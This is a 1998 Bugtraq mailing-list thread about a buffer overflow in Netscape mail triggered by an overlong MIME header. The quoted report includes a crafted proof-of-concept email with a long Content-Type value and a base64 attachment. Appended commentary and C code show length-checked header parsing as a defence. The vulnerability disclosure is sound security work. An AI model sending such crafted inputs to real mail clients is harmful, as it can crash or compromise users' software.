Bugtraq mailing list archives

Re: netscape mail overflow(another one)


From: brett () LARIAT ORG (Brett Glass)
Date: Tue, 28 Jul 1998 23:49:04 -0600


It makes perfect sense that any header field could overflow a limited buffer.
I'd assumed that developers would have the sense to check ALL of the buffers
used to store headers, but maybe this should be pointed out to them, just to
make sure.

We may see exploits based on bugs in UUDECODE and BinHex decoders in mailers
as well. I'm sure they're there given the overall low quality of the code
that these companies are generating (sigh).

--Brett Glass

At 08:21 PM 7/28/98 +0200, Paul Boehm wrote:

Hi,
netscape mail crashes when trying to the attachment
from the following pseudo mime mail:

From: Paul Boehm <paul () boehm org>
To: paul () boehm org
Subject: test
Mime-Version: 1.0
Content-Type: AAAAAAAAAAAAAAAAAAAAAA...; boundary=ABC123
--ABC123
Content-Type: text/plain; charset=us-ascii

test123

--ABC123
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AA"

H4sIAA7jvDUAA+3OOQ6EQBBD0Y45hY9QJejiPI1EBhJiuT+LiEeaAEj+SxzYgdfR09PcLMyU
JLURdzZX3hopcm49vD6Ks/acZI8/O2zLWmYpTWUbfu/6+Y0/L+uGUn39AQAAAAAAAAAAAAAA
AADwvx2CTC7aACgAAA==

--ABC--

I suppose this is exploitable, but I don't really know.
I only tested this with win95 netscape 4.05.

bye,
   paul

--

[ Paul S. Boehm | paul () boehm priv at | http://paul.boehm.org/ | infected@irc ]

Money is what gives a programmer his resources. It's an exchange system created
by human beings. It surrounds us. Works for us, binds the economy together.
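Brett's point above is that every header field copied into a fixed buffer needs a length check, and Paul's test message shows the case that bites: a Content-Type value far longer than the parser expects. The following C is an added illustration, not code from Netscape or from either poster; the buffer sizes and the `parse_content_type` function are assumptions chosen to mimic a small mail client's header parser, written so that an overlong value is rejected instead of overrunning the buffer.

```c
#include <string.h>

/* Fixed-size buffers, as a small mail client might have used. The point is
   that every copy into them is length-checked, so an overlong header value is
   rejected rather than running past the end of the buffer. (Sizes assumed.) */
#define TYPE_MAX     64
#define BOUNDARY_MAX 70   /* RFC 2046 limits a boundary to 70 characters */

struct content_type {
    char type[TYPE_MAX];
    char boundary[BOUNDARY_MAX + 1];
};

/* Copy len bytes from src into dst only if they fit with a terminating NUL.
   Returns 0 on success, -1 if the value is too long for the buffer. */
static int copy_bounded(char *dst, size_t cap, const char *src, size_t len)
{
    if (len >= cap)
        return -1;          /* the unsafe version would strcpy() here */
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Parse the value of a Content-Type header, e.g.
   "multipart/mixed; boundary=ABC123".
   Returns 0 on success, -1 if the media type or boundary is too long. */
int parse_content_type(const char *value, struct content_type *out)
{
    const char *semi = strchr(value, ';');
    size_t type_len = semi ? (size_t)(semi - value) : strlen(value);
    const char *b;
    size_t blen;

    memset(out, 0, sizeof *out);
    if (copy_bounded(out->type, sizeof out->type, value, type_len) < 0)
        return -1;          /* overlong media type: reject the header */
    if (!semi)
        return 0;           /* no parameters, e.g. plain "text/plain" */

    b = strstr(semi, "boundary=");
    if (!b)
        return 0;           /* parameters present but no boundary */
    b += strlen("boundary=");
    blen = strcspn(b, "; \t\r\n");
    return copy_bounded(out->boundary, sizeof out->boundary, b, blen);
}
```

Feeding it a value such as the 150-character type from the quoted message returns -1 and leaves the buffers untouched, which is the check Brett is asking developers to apply to every header, not just the ones they happen to have thought about.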
